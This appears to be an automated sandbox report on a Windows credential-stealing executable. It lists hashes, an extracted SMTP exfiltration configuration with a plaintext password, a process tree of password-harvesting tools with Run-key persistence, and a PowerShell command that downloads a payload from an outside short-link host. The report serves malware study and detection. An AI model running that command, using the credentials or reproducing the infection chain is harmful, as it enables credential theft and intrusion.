Analysis
- max time kernel: 150s
- max time network: 124s
- platform: windows10-2004_x64
- resource: win10v2004-20220721-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20220721-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 24-07-2022 01:43

Static task: static1

Behavioral task: behavioral1
- Sample: 5a26755f58c6941b7a271ff806ede5fc2a952b575187643ecddecb40becc478f.exe
- Resource: win7-20220718-en

Behavioral task: behavioral2
- Sample: 5a26755f58c6941b7a271ff806ede5fc2a952b575187643ecddecb40becc478f.exe
- Resource: win10v2004-20220721-en

General
- Target: 5a26755f58c6941b7a271ff806ede5fc2a952b575187643ecddecb40becc478f.exe
- Size: 912KB
- MD5: 598843804e5c6c64eba09b9cd08bfd9d
- SHA1: 213f93a0b4c73e5b8368e375dd0e89b053f9bcf5
- SHA256: 5a26755f58c6941b7a271ff806ede5fc2a952b575187643ecddecb40becc478f
- SHA512: 0538d5c57ed42976b037bcfad36e42fe13b3aa98a57b7dd0b32006b0d589a72c48fc05daba12a11358a42dd86d9ceccca22b38e9bcad9c0a728c72a303e68046

Malware Config
Extracted
- Protocol: smtp
- Host: smtp.vivaldi.net
- Port: 587
- Username: [email protected]
- Password: nAMkXP8FUGvSc3wjPCKF

Signatures

NirSoft MailPassView (4 IoCs)
Password recovery tool for various email clients
- resource: behavioral2/memory/4764-155-0x0000000000000000-mapping.dmp; yara_rule: MailPassView
- resource: behavioral2/memory/4764-156-0x0000000000400000-0x000000000041B000-memory.dmp; yara_rule: MailPassView
- resource: behavioral2/memory/4764-158-0x0000000000400000-0x000000000041B000-memory.dmp; yara_rule: MailPassView
- resource: behavioral2/memory/4764-159-0x0000000000400000-0x000000000041B000-memory.dmp; yara_rule: MailPassView

NirSoft WebBrowserPassView (4 IoCs)
Password recovery tool for various web browsers
- resource: behavioral2/memory/4332-161-0x0000000000000000-mapping.dmp; yara_rule: WebBrowserPassView
- resource: behavioral2/memory/4332-162-0x0000000000400000-0x0000000000458000-memory.dmp; yara_rule: WebBrowserPassView
- resource: behavioral2/memory/4332-164-0x0000000000400000-0x0000000000458000-memory.dmp; yara_rule: WebBrowserPassView
- resource: behavioral2/memory/4332-166-0x0000000000400000-0x0000000000458000-memory.dmp; yara_rule: WebBrowserPassView

Nirsoft (8 IoCs)
- resource: behavioral2/memory/4764-155-0x0000000000000000-mapping.dmp; yara_rule: Nirsoft
- resource: behavioral2/memory/4764-156-0x0000000000400000-0x000000000041B000-memory.dmp; yara_rule: Nirsoft
- resource: behavioral2/memory/4764-158-0x0000000000400000-0x000000000041B000-memory.dmp; yara_rule: Nirsoft
- resource: behavioral2/memory/4764-159-0x0000000000400000-0x000000000041B000-memory.dmp; yara_rule: Nirsoft
- resource: behavioral2/memory/4332-161-0x0000000000000000-mapping.dmp; yara_rule: Nirsoft
- resource: behavioral2/memory/4332-162-0x0000000000400000-0x0000000000458000-memory.dmp; yara_rule: Nirsoft
- resource: behavioral2/memory/4332-164-0x0000000000400000-0x0000000000458000-memory.dmp; yara_rule: Nirsoft
- resource: behavioral2/memory/4332-166-0x0000000000400000-0x0000000000458000-memory.dmp; yara_rule: Nirsoft

Blocklisted process makes network request (2 IoCs)
- flow 4: pid 3300, powershell.exe
- flow 6: pid 3300, powershell.exe

Executes dropped EXE (2 IoCs)
- pid 4640: Chrome.exe
- pid 1852: Windows Update.exe

Checks computer location settings (2 TTPs, 3 IoCs)
Looks up country code configured in the registry, likely geofence.
- Key value queried: \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000\Control Panel\International\Geo\Nation (process: 5a26755f58c6941b7a271ff806ede5fc2a952b575187643ecddecb40becc478f.exe)
- Key value queried: \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000\Control Panel\International\Geo\Nation (process: WScript.exe)
- Key value queried: \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000\Control Panel\International\Geo\Nation (process: Chrome.exe)

Uses the VBS compiler for execution (1 TTPs)

Accesses Microsoft Outlook accounts (1 TTPs, 1 IoCs)
- Key opened: \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts (process: vbc.exe)

Adds Run key to start application (2 TTPs, 1 IoCs)
- Set value (str): \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Update = "C:\\Users\\Admin\\AppData\\Roaming\\WindowsUpdate.exe" (process: Windows Update.exe)

Drops desktop.ini file(s) (2 IoCs)
- File created: C:\Windows\assembly\Desktop.ini (process: Chrome.exe)
- File opened for modification: C:\Windows\assembly\Desktop.ini (process: Chrome.exe)

Legitimate hosting services abused for malware hosting/C2 (1 TTPs)

Looks up external IP address via web service (2 IoCs)
Uses a legitimate IP lookup service to find the infected system's external IP.
- flow 8: whatismyipaddress.com
- flow 10: whatismyipaddress.com

Suspicious use of SetThreadContext (2 IoCs)
- PID 1852 (Windows Update.exe) set thread context of 4764 (procid_target 83)
- PID 1852 (Windows Update.exe) set thread context of 4332 (procid_target 84)

Drops file in Windows directory (3 IoCs)
- File opened for modification: C:\Windows\assembly (process: Chrome.exe)
- File created: C:\Windows\assembly\Desktop.ini (process: Chrome.exe)
- File opened for modification: C:\Windows\assembly\Desktop.ini (process: Chrome.exe)

Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Modifies registry class (1 IoCs)
- Key created: \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings (process: 5a26755f58c6941b7a271ff806ede5fc2a952b575187643ecddecb40becc478f.exe)

Suspicious behavior: EnumeratesProcesses (64 IoCs)
- pid 3300: powershell.exe (2 entries)
- pid 1852: Windows Update.exe (remaining 62 entries, all the same pid and process)

Suspicious use of AdjustPrivilegeToken (3 IoCs)
- Token: SeDebugPrivilege, pid 4640 (Chrome.exe)
- Token: SeDebugPrivilege, pid 3300 (powershell.exe)
- Token: SeDebugPrivilege, pid 1852 (Windows Update.exe)

Suspicious use of WriteProcessMemory (30 IoCs)
- PID 2576 (5a26755f58c6941b7a271ff806ede5fc2a952b575187643ecddecb40becc478f.exe) wrote to memory of 4640, procid_target 78 (3 entries)
- PID 2576 (5a26755f58c6941b7a271ff806ede5fc2a952b575187643ecddecb40becc478f.exe) wrote to memory of 1720, procid_target 79 (3 entries)
- PID 1720 (WScript.exe) wrote to memory of 3300, procid_target 80 (3 entries)
- PID 4640 (Chrome.exe) wrote to memory of 1852, procid_target 82 (3 entries)
- PID 1852 (Windows Update.exe) wrote to memory of 4764, procid_target 83 (9 entries)
- PID 1852 (Windows Update.exe) wrote to memory of 4332, procid_target 84 (9 entries)

Processes
- C:\Users\Admin\AppData\Local\Temp\5a26755f58c6941b7a271ff806ede5fc2a952b575187643ecddecb40becc478f.exe (depth 1)
  Command: "C:\Users\Admin\AppData\Local\Temp\5a26755f58c6941b7a271ff806ede5fc2a952b575187643ecddecb40becc478f.exe"
  - Checks computer location settings
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  PID: 2576
  - C:\Users\Admin\AppData\Local\Temp\Chrome.exe (depth 2)
    Command: "C:\Users\Admin\AppData\Local\Temp\Chrome.exe"
    - Executes dropped EXE
    - Checks computer location settings
    - Drops desktop.ini file(s)
    - Drops file in Windows directory
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID: 4640
    - C:\Users\Admin\AppData\Roaming\Windows Update.exe (depth 3)
      Command: "C:\Users\Admin\AppData\Roaming\Windows Update.exe"
      - Executes dropped EXE
      - Adds Run key to start application
      - Suspicious use of SetThreadContext
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      PID: 1852
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe (depth 4)
        Command: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\Admin\AppData\Local\Temp\holdermail.txt"
        - Accesses Microsoft Outlook accounts
        PID: 4764
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe (depth 4)
        Command: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\Admin\AppData\Local\Temp\holderwb.txt"
        PID: 4332
  - C:\Windows\SysWOW64\WScript.exe (depth 2)
    Command: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\s7.vbs"
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory
    PID: 1720
    - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (depth 3)
      Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nologo -command "iwr -uri https://2no.co/2Appw5"
      - Blocklisted process makes network request
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      PID: 3300

Network
MITRE ATT&CK Enterprise v6
Downloads
- Filesize: 640KB (this entry is listed four times in the report's download list)
  MD5: ceb41183c47cfdfc02f2f823f59345a4
  SHA1: a8ce2f8b8912e5d59653af4e426e8ddd92823e1e
  SHA256: 338b52b52f0352a2c543b60ead3e80767bd32d44fc5dee050fef4a703ce58fc0
  SHA512: 6ce3b9e1712023cdacb1b23f15ed9ff634c93c95b7d05f4c86e38cd06db8aa7b818f49e607ddbe11bb588af9b996f9daa7b7f2cb31b67ab6067429d95c6efbed
- Filesize: 44B
  MD5: 9adcd38d352368d85ae6dc22cd2393ec
  SHA1: 608f7f4ddd5547b537b1a3075a12a11ff03bdd82
  SHA256: 2fa2cf15eacef5258245ba5f331cfd8286547cca36babb479e46deb0b9000408
  SHA512: b3eab8af2d965a158abcf385c4ff386ff170214779ba29976e21f2044f0fc2ee16766e4496cd0ffe21fed789aaad91e0ff27ff0fad16bd51e5b19b1332508d28
- Filesize: 3KB
  MD5: f94dc819ca773f1e3cb27abbc9e7fa27
  SHA1: 9a7700efadc5ea09ab288544ef1e3cd876255086
  SHA256: a3377ade83786c2bdff5db19ff4dbfd796da4312402b5e77c4c63e38cc6eff92
  SHA512: 72a2c10d7a53a7f9a319dab66d77ed65639e9aa885b551e0055fc7eaf6ef33bbf109205b42ae11555a0f292563914bc6edb63b310c6f9bda9564095f77ab9196
- Filesize: 29KB
  MD5: 46ea1b5552e77fbc7679f93124754c57
  SHA1: 39cbbdba52ccacd8f874c7afac32b712c2e5bff9
  SHA256: 54a60ce0810b7b0d3e2ab1a9f9f51752d7573a694ec7c1c252a907fb3117bca5
  SHA512: ac9f19f3314ec3f1c71d4e4681de52102d33110ed4f662b3e2c2a4577f66581d3ba43577ad5ff4ba557145afbf97aa4daec825f57bc9cfda4efd335530d6cb70